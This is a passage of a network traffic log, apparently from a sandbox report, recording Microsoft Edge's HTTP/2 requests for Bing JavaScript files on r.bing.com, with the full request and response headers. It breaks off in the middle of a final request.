alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12cf
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/NfTD8Ovh04Y_Ni14YxqYB8R_2_Q.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/NfTD8Ovh04Y_Ni14YxqYB8R_2_Q.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:17:19 GMT
etag: 0x8DCDC608BA54CA4
content-type: text/javascript; charset=utf-8
content-md5: fr82fvtvcsicFIwsSPlj7g==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 602e271b-401e-0034-26ec-154538000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 487
cache-control: public, no-transform, max-age=255080
expires: Sat, 07 Dec 2024 08:59:34 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12d0
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rs/6v/ku/jnc,nj/cNbseG2vlUH2ubvgjbDJtgTzQPo.js?or=w

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rs/6v/ku/jnc,nj/cNbseG2vlUH2ubvgjbDJtgTzQPo.js?or=w HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 241
content-type: application/x-javascript; charset=utf-8
server: Kestrel
access-control-allow-headers: *
access-control-allow-origin: *
content-encoding: br
last-modified: Mon, 23 Sep 2024 23:41:33 GMT
x-eventid: 672daa4d6fb24231b8428abb5966fd2b
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
x-as-instrumentationoptions: AppServerLoggingMaster=1
x-as-machinename: DUBEEAP0000E09E
x-as-suppresssetcookie: 1
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-jqCESHTkgU9sK5H22Ep6zngn3uvZPGwZviCo7BNVHRY='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]}
cross-origin-resource-policy: cross-origin
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.75}
cache-control: public, max-age=124509
expires: Thu, 05 Dec 2024 20:43:23 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12d1
timing-allow-origin: *
GET

https://r.bing.com/rp/fRSNKQanUHk53F1a1Bi8UA71Qt4.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/fRSNKQanUHk53F1a1Bi8UA71Qt4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:46:13 GMT
etag: 0x8DCDC6494C9BF9A
content-length: 174
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: +jWBJey2nJqR+pG7G7E28A==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7fcf8c82-301e-003b-4d01-17a8ce000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=187470
expires: Fri, 06 Dec 2024 14:12:44 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12d2
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/mOy7YpeLJ3c40BBAFNUI6SmOUTY.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/mOy7YpeLJ3c40BBAFNUI6SmOUTY.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:56:27 GMT
etag: 0x8DCDC66034C9278
content-length: 507
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: Tm502hkAmxWuxzxBM7uX9A==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f848f133-f01e-0062-47bc-17ad48000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=134932
expires: Thu, 05 Dec 2024 23:37:06 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12d3
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/6mZmj1db42G_jniFgdT7MCvBgyA.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/6mZmj1db42G_jniFgdT7MCvBgyA.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 05:51:04 GMT
etag: 0x8DCDC5CE09E00D2
content-length: 375
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: kdgVpI0X+oWcnOv0ZCUuIA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 24a5e4a3-801e-0029-2ae5-149cd2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=174963
expires: Fri, 06 Dec 2024 10:44:17 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12d4
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/iY8PAEydb3lbGfuJiuA9ICzXgY8.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/iY8PAEydb3lbGfuJiuA9ICzXgY8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:50:43 GMT
etag: 0x8DCDC6535F306CD
content-length: 490
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 3vstlq/a5ZcE98e8La1vPw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 09ff7c48-201e-0024-6697-1673de000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=171301
expires: Fri, 06 Dec 2024 09:43:15 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12d5
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/UftfQbYuKvGGEUHPU3QGHYd90Z8.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/UftfQbYuKvGGEUHPU3QGHYd90Z8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:28:19 GMT
etag: 0x8DCDC62149C3678
content-length: 386
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 6W4GJTTFhKoLN+eXDWPo3Q==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2f7b32df-801e-006d-2071-1540be000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=136340
expires: Fri, 06 Dec 2024 00:00:34 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12d6
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/yZjAz6-B4hIBhJ6D3nAyY_Ebn44.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/yZjAz6-B4hIBhJ6D3nAyY_Ebn44.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 07:15:09 GMT
etag: 0x8DCDC689FBBE351
content-length: 213
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: WEjo6St2+BsB3AUDglK12Q==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: ee327b3e-c01e-0043-5f95-15c079000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=294099
expires: Sat, 07 Dec 2024 19:49:53 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12d7
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/zlfm-hC70pZAs62UVTTl3KShKOE.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/zlfm-hC70pZAs62UVTTl3KShKOE.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 07:16:51 GMT
etag: 0x8DCDC68DCA5DDA0
content-length: 446
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: wMjND6gwy3LKsXBo8Ww74w==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 87927048-e01e-001b-63cf-15c402000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=84302
expires: Thu, 05 Dec 2024 09:33:16 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12d8
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/DWZSY9SRnkHaYWjJ109REMim90A.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/DWZSY9SRnkHaYWjJ109REMim90A.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:28:47 GMT
etag: 0x8DCE8C2817D87DF
akamai-grn: 0.60ba1302.1731584124.68f44ba5
content-length: 12101
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 63v18faN7ozJ98XstK/S+w==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 44d1c45a-101e-002c-1bde-1a68ad000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=301114
expires: Sat, 07 Dec 2024 21:46:48 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12d9
timing-allow-origin: *
GET

https://r.bing.com/rp/9uYIRoQB-ThMq970XKGeKvrMhL0.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/9uYIRoQB-ThMq970XKGeKvrMhL0.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:28:16 GMT
etag: 0x8DCE8C26ED294B5
akamai-grn: 0.94777b5c.1730314488.768384e
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-type: text/javascript; charset=utf-8
content-md5: ImVBVQpRkRw3Uhb3GEk/ZQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b6201531-e01e-0054-4c08-1b001a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 66669
vary: Accept-Encoding
cache-control: public, no-transform, max-age=324198
expires: Sun, 08 Dec 2024 04:11:32 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12da
timing-allow-origin: *
GET

https://r.bing.com/rp/bdiAPlmUnJhdap3y8myDMEGlF4w.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/bdiAPlmUnJhdap3y8myDMEGlF4w.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:31:13 GMT
etag: 0x8DCE8C2D89FAB3C
content-type: text/javascript; charset=utf-8
content-md5: G9Suce+Oaa1LX/2Nx9LctQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 221f2fc7-501e-006f-3c09-1b4244000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 19997
vary: Accept-Encoding
akamai-grn: 0.a5777b5c.1730384105.107752ae
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=149460
expires: Fri, 06 Dec 2024 03:39:14 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12db
timing-allow-origin: *
GET

https://r.bing.com/rp/WwTHOlBv_iLBpZXNWkp-HzVHgrM.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/WwTHOlBv_iLBpZXNWkp-HzVHgrM.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:31:17 GMT
etag: 0x8DCE8C2DB362309
akamai-grn: 0.96777b5c.1731627830.77d33bc
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-type: text/javascript; charset=utf-8
content-md5: qFAs4wCMzQBOlKg9KBk6eA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7ed530f4-c01e-006a-33fe-1ab63b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 3450
vary: Accept-Encoding
cache-control: public, no-transform, max-age=309420
expires: Sun, 08 Dec 2024 00:05:14 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12dc
timing-allow-origin: *
GET

https://r.bing.com/rs/6v/sQ/jnc,nj/2RFgnacsz6nPw9vvxd8AGFyaQr8.js?or=w

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rs/6v/sQ/jnc,nj/2RFgnacsz6nPw9vvxd8AGFyaQr8.js?or=w HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 182
content-type: application/x-javascript; charset=utf-8
server: Kestrel
access-control-allow-headers: *
access-control-allow-origin: *
content-encoding: br
last-modified: Mon, 14 Oct 2024 12:33:31 GMT
x-eventid: 672daa4db4cf418eb74939705fddc6ed
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
x-as-instrumentationoptions: AppServerLoggingMaster=1
x-as-machinename: DUBEEAP00010617
x-as-suppresssetcookie: 1
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-qNdhKFejyikw5XP4ySrs5Fghitntb6NbbaAi/g7PWBA='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]}
cross-origin-resource-policy: cross-origin
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.75}
cache-control: public, max-age=130011
expires: Thu, 05 Dec 2024 22:15:05 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12de
timing-allow-origin: *
GET

https://r.bing.com/rp/CcMXS8Oo0OUnUE0LzYK9AFJ6la8.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/CcMXS8Oo0OUnUE0LzYK9AFJ6la8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:00:06 GMT
etag: 0x8DCDC5E23EBB645
content-length: 791
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: rqa21C4TqvhBKaqsPZN5dA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 62fe1384-101e-0005-3f0f-181eef000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=372037
expires: Sun, 08 Dec 2024 17:28:51 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12df
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/R5OIlHZUEYWuNhJa46yx5Wir2pM.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/R5OIlHZUEYWuNhJa46yx5Wir2pM.br.js HTTP/2.0
host: r.bing.com
